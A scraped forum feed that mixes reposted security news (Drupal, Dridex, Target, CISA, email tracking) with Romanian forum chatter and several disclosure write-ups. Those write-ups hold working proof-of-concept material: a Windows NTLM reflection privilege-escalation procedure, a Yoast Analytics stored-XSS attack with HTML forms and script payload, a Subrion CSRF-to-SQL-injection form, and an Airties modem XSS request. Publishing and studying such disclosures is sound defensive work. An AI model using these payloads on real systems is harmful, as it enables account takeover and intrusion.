Aerosol

Drupal, one of the widely used open source content management system is recommending its users to update their software to the latest versions 6.35 and 7.35 after the company discovered two moderately critical vulnerabilities that may allow an attacker to hack Drupal websites. According to a security advisory published yesterday, a flaw found in the Drupal core could allow a potential hacker under certain circumstances to bypass security restrictions by forging the password reset URLs. ACCESS BYPASS / PASSWORD RESET URLs VULNERABILITY Successful exploitation of this Access Bypass vulnerability could leverage the hacker to gain unauthorized access to user accounts without knowing their password. This vulnerability is considered as moderately critical in which an attacker can remotely trick a registered user of Drupal based website, such as an administrator, into launching a maliciously crafted URL in an attempt to take control of the target server. AFFECTED DRUPAL WEBSITES The exploitation of the access bypass vulnerability on Drupal 7 website is possible only if the account importing or programmatically editing process results in the password hash in the database being the same for multiple user accounts. The websites running Drupal 6 are at greater risk, because the administrators of the websites have created multiple new user accounts protected by the same password. Moreover, the security vulnerability can also be exploited in the Drupal 6 websites where accounts have been imported or programmatically edited in a way that results in the password hash field in the database being empty for at least for one user account. OPEN REDIRECT VULNERABILITY The affected versions of Drupal CMS are also susceptible to an open redirect vulnerability. Drupal action URLs contain a "destination" parameter in it, which can be used by cyber criminals to redirect users to a third-party location with malicious content. According to the Drupal team, there are multiple URL-related API functions in affected versions of Drupal 6 and 7 which can be used by attackers into passing through external URLs when not required. This could potentially lead to additional open redirect vulnerabilities. The issue is actually serious because Drupal is used to power over 1 billion websites on Internet, which puts Drupal in third place behind the Wordpress and Joomla. Drupal provides a Content management system for websites including MTV, Popular Science, Sony Music, Harvard and MIT. RECOMMENDATIONS Website administrators are strongly recommended to take some necessary steps: Update to the latest version of Drupal core, i.e. Drupal core 6.35 and Drupal core 7.35 Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack. Do not click on links from unknown sources. Do not open email attachments from unknown or untrusted sources. Consider implementing file extension whitelists for allowed e-mail attachments. Source

Arata mai bine tema cum ati modificat acum. Ce sa zic bafta cu "proiectul" @DeadSoul nu e rank special imi place imaginea aia si culoarea

@Kronzy de ce dati ma rep la om Poveste Join Date: Aveam cont din 2006 cu cateva posturi, numele pe care am inceput sa-l folosesc prin 2010 este Aerosol asa ca am vrut sa imi schimb numele pe contul ala ( dar doar V.I.P. aveau dreptul sa isi schimbe numele, asa ca mi-a sters contul acela si mi-a modificat la aceste in 2006 ) Sper ca te-ai lamurit.

@quadxenon imi era dor de tine pustiule nu ai mai comentat aiurea la posturile mele de ceva vreme. Pai hai sa te lamuresc, e vorba ca a EXISTAT aceasta vulnerabilitate si poate cei ce se ocupa de Pentesting, bla, bla bla poate vor sa vada ce a facut omul ( vezi video ) ai auzit de bypass sau chestii de genul ? Din nou daca nu aveti ceva inteligent de zis sau daca comentati doar pentru +1 mai bine nu mai comentati.

If you have enabled automatic Facebook Photo Sync feature on your iPhone, iPad or Android devices, then Beware! Hackers can steal your personal photographs without your knowledge. In 2012, the social network giant introduced Facebook Photo Sync feature for iPhone, iPad and Android devices which, if opt-in, allows Facebook to automatically sync all your photos saved on your mobile device with your Facebook account. The photos that you have synced from your phone are automatically uploaded in the background to a private Facebook album, which is not visible to any of your Facebook friends or other Facebook users. However, you may can choose then to share photos from the album on your Facebook timeline or send them as a message to a friend. A bug bounty hunter, Laxman Muthiyah, discovered a critical flaw in the Facebook Photo Sync feature and Facebook API that could allow any third-party app to access your personal photos from the hidden Facebook Photo Sync album. It's something that reminds me of "The Fappenings" and "The Snappening" -- in which nude and personal photographs of top celebrities were leaked due to a security flaw in Apple's iCloud file storage service and unofficial Snapchat messaging service app, respectively. In a blog post published today, Laxman explained that the vulnerability resides in the privilege mechanism that which applications are allowed to access sync photos using vaultimages API. Technically, Synced private photo album should be accessible by only Facebook's official app, but the vulnerability allows any 3rd party apps to get permission to read your personal synced photos. Laxman previously disclosed a vulnerability in Facebook Graph API mechanism that allowed him to delete any photo album on Facebook owned by any user, any page or any group. HOW TO DISABLE AUTO-SYNC Though, Facebook has patched the vulnerability reported by Laxman and rewarded him with $10,000 under it’s bug bounty program, Facebook users are advised to turn off Facebook Photo Sync feature just to be on the safer side. In order to do so, just go to Facebook mobile app menu, scroll down and select Account > App Settings > Sync Photos, then Choose 'Don't sync my photos.' Source

If you're currently on a Mac computer and using a Chrome browser then a weird little Apple's OS X quirk, just a special thirteen-characters string could cause your tab in Chrome to crash instantly. A string of 13 characters (appear to be in Assyrian), shown below in an image, is all needed to crash any tab in Chrome for OS X, however, this text has no impact on Windows, Android, or iOS operating systems. This Chrome crash vulnerability has already been reported by an open-source project Chromium project, which means that Google is likely aware of this troublesome issue. What steps will reproduce the problem? Any page with [that special character] will crash the chrome tab on a Mac. Just create any dummy page with the unicode characters, and the Mac Chrome tab will crash hard. What is the expected result? Expect it not to crash What happens instead? It crashes Warning: Do not click on this link, which actually points to the bug report on the Chromium product describing the issue, if your are using Chrome on a Mac. If you’ll click, it will immediately cause the Chrome tab to crash in which the link opens. Emil Protalinski of VentureBeat says even the tab showing the news article also crashes for some readers. The issue appears to be small but is really serious, as it is possible for anyone to tweet out the text in question, and crash all Chrome for Mac users whose Twitter timeline will load those characters. The developer who discovered this bug gives two different scenarios in which this bug could be abused. "This is pretty serious. You could imagine someone spamming this message in Hangouts/Gmail and just straight-up force crashing all Mac Chrome browsers," the developer said. Furthermore, someone could post this 13-characters string on Facebook walls or timelines, and force-crash all Mac Chrome browsers that will saw the characters in question. VentureBeat notes that the Chrome crash doesn't happen every time, in some cases, when Chrome renders text differently, Mac users see 13 blank rectangles (????? ??? ?????) instead of the crash, though they never see the proper characters. It's currently not known why this character causes tab on Chrome to crash while page rendering, but we'll recommend you to do not use theses characters while Tweeting or dropping them in the comments or emailing them to the entire company or posting them to Facebook or as a headline of your blog post. If you are curious just how often and why your Chrome is crashing, you can type chrome://crashes into your location bar and press Enter to view the list of crashes. Source

Source: https://code.google.com/p/google-security-research/issues/detail?id=222 Windows: Local WebDAV NTLM Reflection Elevation of Privilege Platform: Windows 8.1 Update, Windows 7 Class: Elevation of Privilege Summary: A default installation of Windows 7/8 can be made to perform a NTLM reflection attack through WebDAV which allows a local user to elevate privileges to local system. Description: NTLM reflection is a well known issue with Windows authentication. It’s typically abused in networked scenarios to reflect credentials from one machine to another. It used to be possible to reflect credentials back to the same machine but that was mitigated in MS08-068 by not honouring NTLM authentication sessions already in flight. However this did nothing to stop cross-protocol attacks. The WebClient service for WebDAV (which is installed and enabled by default, although you’d need to start it using its service trigger) also does NTLM authentication if the server requests it. As Windows has no block on binding to TCP ports < 1024 from a normal user account then we can setup our own WebDAV server running as a normal user bound to localhost (so also no firewall issues). If we can convince another user, ideally local system to connect to the WebDAV server we can start an NTLM authentication session. This can then be replayed locally to the TCP/IP CIFS service endpoint to authenticate as that user. If this was a local system account then that gives you full local admin privs, you can read/write any file on the system through the admin shares. You could also bind to local named pipes such as the service manager and create a new privileged service. I’d put money on there being many ways of getting local system to open an arbitrary file, but the easiest one to exploit is Windows Defender (at least on Windows 8.1). You can tell it to initiate a scan of a file which gets opened under the local system token. Of course this might be a bug in and of itself. No processing of the path is done, it seems to be passed directly to CreateFile. This will cause a webdav connection to start to localhost and then NTLM can be negotiated. I don’t believe I’ve changed the settings on my VMs which would enable this attack. Certainly reading Group Policy settings it seems like localsystem shouldn’t authenticate with the machine account by default, but it seems that you can. I’ve checked my security settings and they look correct. I’ve tested it on Windows 8.1 Update with defender, and on Windows 7 manually executing the open as local system and they both work. After a quick search I can’t find anyone documenting this for the purposes of local privilege escalation attacks although it’s perhaps an obvious way of abusing the functionality so I would expect this is not common knowledge. It is the sort of bug which could be being exploited in the wild considering all it needs is socket access (which is any user) and some way of convincing a privileged user to open the local webdav share. Of course no-doubt it can be effectively mitigated using SMB signing although it isn’t clear that the NTLM extended protection is doing anything to stop it. That said this works in a default installation even with file sharing effectively disabled (at least as far as the GUIs will allow). Even with signing enabled on the client I guess it’s possible that you can reflect the NTLM credentials to a local TCP DCE/RPC endpoint instead to achieve a similar effect. Also I wouldn’t be so sure that WebDAV is the only way of doing this. Again another one might be COM marshaling and specifying a endpoint locally (although it might be clever enough to not directly communicate for that one). Another use for this attack is for negotiating a local impersonation token for local system which could be used for Token Kidnapping purposes. Calling AcceptSecurityContext from any account with permissions to handle enterprise auth will be handed back an impersonation level token, even normal users. But of course network service etc would have most use for the token. Proof of Concept: I’ve provided a PoC which causes the Windows Defender service to open a WebDAV connection as Local System. This is for Windows 8.1 only as Windows 7’s defender doesn’t support the command as far as I know. The credentials are reflected to the local SMB service to write the file dummy.txt to the root of the C: drive. Of course more dangerous things could be done at this point. The PoC is written in Java just because it was the easiest to modify it’s library. No doubt an existing relay application could be repurposed, for example SmbRelay3 is supposed to be able to relay HTTP to SMB auth, but I didn’t try that. 1) Install latest Java 8 JRE. 2) Start the WebClient service, this could be done in many ways from a normal user, for now just start it using the service manager. 3) Extract the PoC to a directory. 4) Run “java -jar SmbTest.jar” in the extracted directory. This binds the WebDAV server then starts a scan with defender, after some seconds the exploit should run (there’s some slowness in everything starting). Repro Notes: If the PoC prints that the WebClient service isn’t started then start it. If no HTTP/NTLM traffic is printed to the console then webdav/mup had marked the server as down. Restart the webclient service and it should fix it. Expected Result: It shouldn’t be possible to elevate privileges, the SMB connection should fail to authenticate Observed Result: Authentication was successful as local system and a file written to the root of the C drive . Proof of Concept: http://www.exploit-db.com/sploits/36424.zip Source

Apple on Tuesday pushed out new versions of its Safari browser that address 17 security vulnerabilities in the WebKit engine. Safari 8.04, 7.14 and 6.24 patch multiple memory corruption issues in WebKit, Apple said. “These issues were addressed through improved memory handling,” Apple said in its advisory. The advisory is sparse in other details on individual CVEs; Apple said that users visiting a website hosting an exploit could put the browser at risk to remote code execution or a crash. A separate WebKit vulnerability affects the user interface and could open the door to phishing attacks. “A user interface inconsistency existed in Safari that allowed an attacker to misrepresent the URL,” Apple said. “This issue was addressed through improved user interface consistency checks.” This is the second set of Apple patches in the last 10 days. The company took care of the FREAK vulnerability in iOS along with another vulnerability that would allow a hacker to remotely restart a user’s phone via a SMS message. Apple iOS 8.2 also patched a vulnerability in the iCloud keychain function that was the result of several buffer overflows. Source

Pushers of the Dridex banking malware have gone old-school for some time now, moving the malware through phishing messages executed by macros in Microsoft Office documents. While macros are disabled by default since the release of Office 2007, the malware includes somewhat convincing social engineering that urges the user to enable macros—with directions included—in order to view an important invoice, bill or other sensitive document. The cat and mouse game between attackers and defenders took another turn recently when researchers at Proofpoint discovered that a recent spate of phishing messages contained macros-based attacks that did not execute until the malicious document was closed. The technique, which involves the inclusion of an AutoClose method, which helps the malware sample evade detection. “The user is enticed to enable macros and open the attachment, and when they open it, they see a blank page and, under the hood, nothing bad happens,” said a Proofpoint advisory. “Instead, the malicious action occurs when the document is closed. The macro payload, in this case, listens for a document close event, and when that happens, the macro executes.” The use of this type of VBscript function, Proofpoint said, is effective against sandbox detection capabilities. Malware that delays execution isn’t necessarily a new evasion tactic, but attackers have been getting innovative about side-stepping security protections in place. For example, sandboxes and intrusion detection software became wise to short delays in execution times. By executing only when the document closes, this current string of Dridex seems to have taken the next step. “As sandboxes have adjusted to also ‘wait,’ the ability of the malicious macro to run when the document closes expands the infection window and forces a detection sandbox to monitor longer and possibly miss the infection altogether,” Proofpoint said. “No matter how long the sandbox waits, infection will not occur, and if the sandbox shuts down or exits without closing the document, the infection action will be missed entirely.” Dridex, once it’s implanted on the compromised machine behaves like most banking malware. It waits for the user to visit their online banking account and injects code onto the bank’s site and captures user credentials via an iframe. Dridex and its cousin Cridex are members of the GameOver Zeus family, which is also adept at wire fraud. GoZ uses a peer-to-peer architecture to spread and send stolen goods, opting to forgo a centralized command-and-control. P2P and domain generation algorithm techniques make botnet takedowns difficult and extend the lifespan of such malware schemes. Previous Dridex campaigns have spread via Excel documents laced with a malicious macro. Earlier this month, researchers at Trustwave found a spike of phishing messages using XML files as a lure. The XML files were passed off as remittance advice and payment notifications, and prey on security’s trust of text documents to get onto machines. These older Dridex campaigns targeted U.K. banking customers with spam messages spoofing popular companies either based or active in the U.K. Separate spam spikes using macros started in October and continued right through mid-December; messages contained malicious attachments claiming to be invoices from a number of sources, including shipping companies, retailers, software companies, financial institutions and others. Source

Frate "Suckciffer" asta e orice altceva DAR NU HACKER, cum puteti frate sa-l numiti pe paralelu asta hacker. doamne, asta in loc sa aiba copii si familie la varsta lui se tine de prostii pe care le fac copii de 13/14 ani ce au comunitati de gaming. EPIC TROLL! @wirtz acum serios frate, omul este vai de el. ( macar acum stim cine e tatal lui Valium... ) Ce dovezi aduce? ca ala era om care se ocupa de casa aleia? LOL ( omu e prajit la modul grav. )

Salut si bine ai [re]venit.

Felicitari @Kronzy sa ne anunti cand ti-au raspuns, cat despre tine quadxenon nu mai fa offtopic in thread-ul omului. ( puteai sa-i dai PM ca si-a uitat IP in poza si aia e. )

Intel sharing used as stick, Vice Chancellor says The US Government threatened to starve Berlin of intelligence if it harboured fugitive document-leaker Edward Snowden, German Vice Chancellor Sigmar Gabriel says. The National Security Agency (NSA) leaker considered Germany as a place of refuge after he fled to Russia from the United States via Hong Kong in 2013. Moscow granted Snowden a three-year residency permit in the country, which expires in August 2017. At that date Snowden will need to apply for citizenship or move elsewhere. In a speech given this week in Hamburg Gabriel said Washington would withhold information on "plots" and "intelligence matters" if Germany offered Snowden asylum. “They told us they would stop notifying us of plots and other intelligence matters,” Gabriel said, according to an Intercept report. The report did not name the US agency or official who made the extraordinary threats. Severing intelligence which appear to place the country of 80 million at heightened risk of terrorist and espionage attacks. Germany would be obligated to extradite Snowden to the US if he entered the country, Gabriel says, and faced being cut-off from "all intercepted intelligence sharing" if it offered asylum, according to the report. Questions of whether Snowden should be granted asylum in Germany were raised in November 2013 when the leaker was still under temporary protection from Moscow. German Green Party figure Hans-Christian Ströbele who was the first parliamentarian to visit the leaker during his Moscow exile raised the concept after the US had submitted an extradition request for Snowden should he have set foot in the country. Vice Chancellor Gabriel said it was "a shame" Snowden was confined to “Vladimir Putin’s autocratic Russia”. The report comes as Snowden's Russian lawyer Anatoly Kucherena said last month the former sys-admin is reportedly ready to return to the US if he is promised a fair trial. Source

Ever feel your eyes glazing over when you see yet another security warning pop up on your monitor? In a first, scientists have used magnetic resonance imaging to measure a human brain's dramatic drop in attention that results when a computer user is subjected to just two security warnings in a short time. In a paper scheduled to be presented next month at the Association for Computing Machinery's CHI 2015 conference, researchers will present data that maps regions of the brain responsible for visual processing. The MRI images show a "precipitous drop" in visual processing after even one repeated exposure to a standard security warning and a "large overall drop" after 13 of them. Previously, such warning fatigue has been observed only indirectly, such as one study finding that only 14 percent of participants recognized content changes to confirmation dialog boxes or another that recorded users clicking through one-half of all SSL warnings in less than two seconds. Building a better mousetrap The inattention is the result of a phenomenon known as habituation, or the tendency for organisms' neural systems to show partial or complete cessations of responses to stimuli over repeated exposures. Such repetition suppression, or RS, has long been documented in everything from sea slugs to humans. By directly measuring RS in the brains of people exposed to computer security warnings, the scientists were then able to test more effective ways that software makers can alert people to potential risks. The paper—titled "How Polymorphic Warnings Reduce Habituation in the Brain—Insights from an fMRI Study"—is one of two to be presented at CHI 2015 that studies people's responses to security warnings. A second paper is titled "Improving SSL Warnings: Comprehension and Adherence." Besides leading to potential improvements in user interfaces, the research may pave the way for better security education, training, and awareness (SETA) programs, password use, and information security policy compliance. The scientists wrote: The experiment was conducted on 25 participants recruited from a university who were native English speakers. The subjects laid down on their backs on an MRI table and had a volume coil placed over their heads to allow imaging of the entire brain. The participants then viewed experimental images on a large monitor at the opening of the scanner. In all, each participant viewed a unique set of 560 images. A second experiment tracked participants' responses to security warnings in a more natural setting while using a laptop computer. To measure attention paid to a particular warning, the researchers analyzed users' mouse cursor movements along the x and y, and z axes using a timestamp of each movement at a millisecond rate. The habituation response caused by humans' frequent exposure to warnings has been documented as long ago as 2006. Since then, numerous studies have supported what many people know intuitively: the more times a website, computer, or smartphone displays a warning, the harder it is to heed its urgent message. The fatigue sets off a vicious cycle in which many end users increasingly make poorly informed security choices and designers add more warnings to counteract the increased threats. The researcher team—made up of six scientists from Brigham Young University, the University of Pittsburgh, and Google—went on to test so-called polymorphic warnings. As their name suggests, polymorphic warnings change their colors, text, shapes, and other characteristics rather than presenting the same static content each time. The MRI data showed reduced habituation to repeated warnings that changed. A second measurement using mouse tracking also showed reduced habituation from repeated warnings, and it also showed slower habituation. The findings could be seminal for makers of software and hardware alike as they search for new ways to steer users clear of everything from weak password choices to websites pushing malware. "Polymorphic warnings garner more attention over time due to the novelty of their changing appearance," the researchers wrote. "Changing appearance of the warning reinvigorates attention, especially in brain regions that have been shown to demonstrate RS to exact repetitions of visual stimuli. For this reason, polymorphic warnings that continually change their appearance will slow the rate of habituation." Source

While some lawmakers claim that a threat information-sharing bill, called CISA, was amended with substantial privacy provisions – privacy experts worry that that the bill still lacks enough protections. Last Thursday, the Senate Intelligence Committee approved the Cybersecurity Information Sharing Act (CISA) in a 14 to 1 vote (that followed a closed door session where several amendments were added to the bill). The legislation, which is said to advocate information-sharing between private companies and government to thwart cyberattacks like the one's striking Sony and Anthem, was strongly contested by the American Civil Liberties Union (ACLU), Electronic Frontier Foundation (EFF), and other privacy rights groups and security experts earlier this month, who said that the bill lacked ample privacy protections in its drafted form. Now that the text of the newly amended bill is available (PDF), grievances remain for some concerning the process through which companies would share information with the government. In a Thursday interview, Gabe Rottman, legislative counsel for the ACLU, told SCMagazine.com that “it's not clear that there would be adequate privacy protections on the front-end when the information is shared with the government.” “Once that information is shared, it can flow through the government, including to the Department of Defense, which includes the NSA,” he explained. Notably, Sen. Ron Wyden, the sole lawmaker to vote against the bill last week, said in a statement that, “If information-sharing legislation does not include adequate privacy protections then that's not a cybersecurity bill – it's a surveillance bill by another name.” In his interview with SCMagazine, ACLU's Rottman added that the scope of surveillance programs revealed by Edward Snowden have shown the government's “tendency to stretch the law as far as it will go,” to further surveillance. “Here, the information would go to DHS, but it could be shared it in real-time without a privacy sweep, including with the National Security Agency,” Rottman said. Source

WHILE YOU’VE LIKELY never heard of companies like Yeswear, Bananatag, and Streak, they almost certainly know a good deal about you. Specifically, they know when you’ve opened an email sent by one of their clients, where you are, what sort of device you’re on, and whether you’ve clicked a link, all without your awareness or consent. That sort of email tracking is more common than you might think. A Chrome extension called Ugly Mail shows you who’s guilty of doing it to your inbox. Sonny Tulyaganov, Ugly Mail’s creator, says he was inspired to write the “tiny script” when a friend told him about Streak, an email-tracking service whose Chrome extension has upwards of 300,000 users. Tulyaganov was appalled. “[streak] allowed users track emails, see when, where and what device were used to view email,” he recalled to WIRED. “I tried it out and found it very disturbing, so decided to see who is actually tracking emails in my inbox.” Once the idea for Ugly Mail was born, it only took a few hours to make it a reality. The reason it was so easy to create is that the kind of tracking it monitors is itself a simple procedure. Marketers—or anyone who’s inspired to snoop—simply insert a transparent 1×1 image into an email. When that email is opened, the image pings the server it originated from with information like the time, your location, and the device you’re using. It’s a read receipt on steroids that you never signed up for. Pixel tracking is a long-established practice, and there’s nothing remotely illegal or even particularly discouraged about it; Google even has a support page dedicated to guiding advertisers through the process. That doesn’t make it any less unsettling to see just how closely your inbox activity is being monitored. Using Ugly Mail is as simple as the service is effective. Once you’ve installed it, the code identifies emails that include tracking pixels from any of the three services mentioned above. Those messages will appear in your inbox with an eye icon next to the subject heading, letting you know that once clicked, it will alert the sender. Tulyaganov also confirmed to WIRED that Ugly Mail also doesn’t store, save, or transmit any data from your Gmail account or computer; everything takes place on the user’s end. Ugly Mail appears to work as advertised in our test, but it has its limitations. It’s only built for Gmail (sorry… Outlookers?) and is only available for Chrome, although Tulyaganov says that Firefox and Safari versions are in the works. And while it’s effective against Yeswear, Bananatag, and Streak, those are just three pixel-tracking providers in a sea of sneaking marketers. Tulyaganov has indicated that Ugly Mail will continue to add more tracking services to its list, but it’s not clear yet how long that might take. The onrush of users after receiving top billing on Product Hunt may help speed up the process. If you’d like take take the extra step of just blocking pixel tracking altogether, another Chrome extension called PixelBlock—also referenced on Product Hunt—automatically prevents all attempts, instead of Ugly Mail’s more passive strategy of simply informing you that they’re happening. Pixel tracking isn’t going away any time soon, and Ugly Mail is an imperfect way to prevent it. But it still offers a valuable glimpse at the marketing machinations we’re all exposed to every day, whether we’re aware of them or not. Source

@Kronzy. https://rstforums.com/forum/97612-top-os-app-vulnerable-2014-a.rst Ce mai ai de zis acum?

Hackers are targeting a number of European businesses and organisations with a spear phishing campaign with the colourful codename Operation Woolen Goldfish. Trend Micro researchers reported uncovering the campaign in an Operation Woolen-Goldfish: When Kittens Go Phishing white paper, warning the attacks are likely a follow-up to the "Rocket Kitten" campaign discovered in December 2014. "In February 2015, the Trend Micro Smart Protection Network received an alert from Europe that triggered several targeted attack indicators related to a specific malware family, prompting our threat defence experts to investigate further," read the report. "The alert showed an infected Microsoft Excel file that soon proved to have been launched by Rocket Kitten." Rocket Kitten was an attack campaign that targeted victims with basic spear phishing messages designed to entice them to open malicious Office files loaded with a rare "Ghole" malware. Trend Micro said the follow-up Woolen Goldfish campaign is far more sophisticated. "By the end of 2014 we saw significant changes in the attack behavior of the Rocket Kitten group in terms of spear-phishing campaigns and malware infection schemes," read the paper. The firm highlighted a Woolen Goldfish attack targeting an Israeli engineer as proof of the group's evolution. "The attackers used a OneDrive link in their campaign. OneDrive is a free online cloud storage system from Microsoft that comes with several gigabytes of data storage capacity," explained the report. "The attackers probably decided to store their malicious binaries online rather than send them as an attachment to bypass email detection. "Once executed, the file drops a non-malicious PowerPoint file used as a decoy file, while silently infecting the system with a variant of the CWoolger keylogger." Trend Micro said the CWoolger keylogger malware appears to have been developed by a hacker operating under the "Wool3n.H4t" pseudonym. Wool3n.H4t is believed to have taken part in past Rocket Kitten attacks. "Consistent with the other malware used by the threat actors involved in Operation Woolen Goldfish, the command and control reference is hard-coded as an IP address in the binary," read the paper. "A domain name was not used. Moreover, it lands on the system with a name, which is very similar to some Ghole malware variants [used by Rocket Kitten]." The paper highlighted the malware as proof the Rocket Kitten hackers are developing new attack tools and could become an even bigger threat in the very near future. Rocket Kitten is one of many targeted attack groups currently active. On 12 March, researchers at Kaspersky reported finding evidence the Equation group has been developing and mounting sophisticated attacks since at least 2003. Source

Target has agreed to pay $10m worth of damages to victims of its 2013 "mega data breach", in a proposed settlement to a class-action lawsuit against it. CBS News reported the deal, claiming that if approved by a federal court judge, individual victims could be paid as much as $10,000 in damages. Target had not responded to V3's request for comment on the report at the time of publishing. The Target breach is believed to have occurred between 27 November and 15 December 2013, and saw hackers break into Target's systems and steal customers' credit and debit card numbers, card expiration dates and debit card PINs. The hackers also stole as many as 70 million customers' names, phone numbers and email and mailing addresses. Numerous security firms subsequently reported finding Target customer details being sold on a number of underground forums. The data breach was credited as one of the biggest in history and led to a complete overhaul of Target's security strategy and systems, as well as a shake-up in the firm's upper management. Target chief information officer (CIO) Beth Jacob resigned from her role in the wake of a data breach in March 2014. Target chief executive Gregg Steinhafel soon followed, stepping down from his role in May 2014. The breach has already had serious financial consequences for Target. Target revealed that the cost of the breach had reached $162m in February. The class-action lawsuit against it in the US District Court of Minnesota is one of many being mounted against Target. The US Department of Justice is also mounting its own investigation into the breach. Target is one of many firms to suffer mass data breaches over the past few years. TalkTalk admitted falling victim to a data breach that let criminals defraud thousand of pounds from its customers in February. Law enforcements have been racing to combat data breaches. US law enforcement charged three men believed to have been behind "the largest data breach in US history" in March. US president Barack Obama outlined plans to create an improved data breach reporting regime for businesses hit by hackers in January. Source

Pinterest has stopped giving out t-shirts and started paying cash for vulnerabilities found under its bug bounty program. The web clipboard will offer up to US$200 under the BugCrowd-managed program for nine of its assets, including the Android and iOS applications. Security engineering lead Paul Moreno said the number of bug reports increased tenfold since it launched its tee-shirt bug bounty prior to its migration to HTTPS. "Prior to the HTTPS migration, we were hesitant to open a paid bug bounty program because of a number of known vulnerabilities associated with being only HTTP," Moreno says. "Now that a number of gaps have been closed as a result of the migration, we’re happy to announce that we’ve upgraded the program with payouts results. "We highly encourage the whitehat hacker community to use our program and report bugs, which helps us keep Pinners safe and increase our security posture." Top bounties will go to remote code execution, "significant" authentication bypass, cross site request forgery, and cross-site scripting. Punters bearing HTTPOnly cookie flags and end of life browser bugs need not apply. Pinterest ran into some problems during its lauded HTPPS migration beginning in Briton including impact to browser performance, mixed secure and insecure content warnings, and higher content delivery network costs. Source

A New York City Police Department (NYPD) auxiliary deputy inspector was arrested Wednesday morning for allegedly hacking into a restricted NYPD computer and other sensitive law enforcement databases. Yehuda Katz used the databases to collect information on individuals who had been involved in traffic accidents in the New York City area, according to a FBI press release. He then posed as an attorney, among other things, and solicited them for a 14 percent fee. Katz allegedly used multiple electronic devices in the NYPD's 70th Precinct that were capable of streaming video and remotely accessing NYPD computers. He was then able to obtain the login information from uniformed officers to view the databases he didn't have permission to access including one belonging to the FBI database. If convicted. Katz faces up to 10 years in prison. Source

EMC M&R (Watch4net) Web Portal Report Favorites XSS EMC Secure Remote Services Virtual Edition SQL Injection EMC Secure Remote Services Virtual Edition Command Injection EMC M&R (Watch4net) Device Discovery Path Traversal EMC M&R (Watch4net) MIB Browser Path Traversal EMC M&R (Watch4net) Alerting Frontend XSS EMC M&R (Watch4net) Centralized Management Console XSS

OVERVIEW ========== Google Analytics by Yoast is a WordPress plug-in for monitoring website traffic. With approximately seven million downloads it’s one of the most popular WordPress plug-ins. A security vulnerability in the plug-in allows an unauthenticated attacker to store arbitrary HTML, including JavaScript, in the WordPress administrator’s Dashboard on the target system. The JavaScript will be triggered when an administrator views the plug-in’s settings panel. No further user interaction is required. Typically this can be used for arbitrary server-side code execution via the plugin or theme editors. Alternatively the attacker could change the administrator’s password, create new administrator accounts, or do whatever else the currently logged-in administrator can do on the target site. DETAILS ======= The impact is a combination of two underlying problems. Firstly, missing access control allows an unauthenticated user to modify some of the settings associated with the plug-in. It’s possible overwrite the existing OAuth2 credentials which the plug-in uses for retrieving data from Google Analytics, and thereby connect the plug-in with the attacker’s own Google Analytics account. Secondly, the plug-in renders an HTML dropdown menu based on the data downloaded from Google Analytics. This data is not sanitized or HTML-escaped. If the said attacker enters HTML code such as <script> tags in the properties in their Google Analytics account settings, it will appear in the WordPress administrative Dashboard of the targeted system and get executed whenever someone views the settings. PROOF OF CONCEPT ================== The following HTML snippet could be used to hijack the Google Analytics account of a website running a vulnerable version of the plug-in: <a href="http://YOUR.BLOG/wp-admin/admin-post.php?reauth=1">reauth</a> <br><br> <form method=POST action="http://YOUR.BLOG/wp-admin/admin-post.php"> <input type=text size=100 name="google_auth_code"> <input type=submit> </form> First, the attacker would click the reauth link. The action doesn't require any kind of authentication. It will reset some of the plugin settings and redirect the attacker to a google.com OAuth dialog, where they'd get an authentication code. Next the attacker would copy-paste the code in the above form and submit. This would update the code in the plugin settings - again without requiring authentication. The plugin would now retrieve its data from the attacker's Google Analytics account. The actual payload script would be entered at the attacker's own Google Analytics account settings at https://www.google.com/analytics/web/?hl=en#management/Settings/ An example of a property name: test"><script>alert('stored XSS')</script> This would fire an alert box whenever an administrator views the Analytics settings page in the Dashboard of the target WordPress site. A real-world attack would probably use a src attribute to load a more sophisticated script from an external site. It could make chained ajax calls to load and submit administrative forms, including those of the plugin editor to write server-side PHP code, and finally execute it. SOLUTION ========= Yoast was notified on March 18, 2015. A new version of the plug-in (5.3.3) was released the next day. CREDITS ======== The vulnerability was found by Jouko Pynnönen of Klikki Oy, Finland. An up-to-date version of this document is available at http://klikki.fi/adv/yoast_analytics.html -- Jouko Pynnönen <jouko@iki.fi> Klikki Oy - http://klikki.fi - @klikkioy Source

# Affected software: subrion # Type of vulnerability: csrf to sql injection # URL: http://demo.subrion.org # Discovered by: Provensec # Website: http://www.provensec.com #version v3.3.0 # Proof of concept no csrf protection on database form which made subrion to vulnerable to database injection vuln parameter query poc: <html> <body> <form action="http://demo.subrion.org/admin/database/" method="POST"> <input type="hidden" name="query" value="SELECT * FROM `sbr301_albums` `id` " /> <input type="hidden" name="table" value="sbr301_albums" /> <input type="hidden" name="field" value="id" /> <input type="hidden" name="exec_query" value="Go" /> <input type="submit" value="Submit request" /> </form> </body> </html> Source

Airties Air5650TT Modem Web Interface Reflected XSS Vulnerability ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Discovered by: KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com Love to = > KedAns-Dz & _UnDeRTaKeR_ & BARCOD3 & Septemb0x & ZoRLu ( milw00rm.com ) ############################################################ ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Hardware/Web App : Airties |~Affected Version : Air6372SO , Air5650TT |~Official Web: http://www.airties.com |~RISK : Light ####################INFO################################ the same network with a social engineering scenario is on the modem manager to do the admin cookies can be captured ######################################################## ---------------------------------------------------------- Proof image: http://i.hizliresim.com/RJAXV6.png ---------------------------------------------------------- Request ---------------------------------------------------------- GET http://192.168.2.1/top.html?productboardtype=%3Ch4%3Eh4%20Here%3C/h4%3E%3Cscript%3Ealert(document.domain)%3C/script%3E Request Headers: Host[192.168.2.1] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] Connection[keep-alive] Response Headers: Content-Type[text/html] DLast-Modified[Tue, 10 Jun 2014 12:43:09 GMT] Content-Length[4594] Source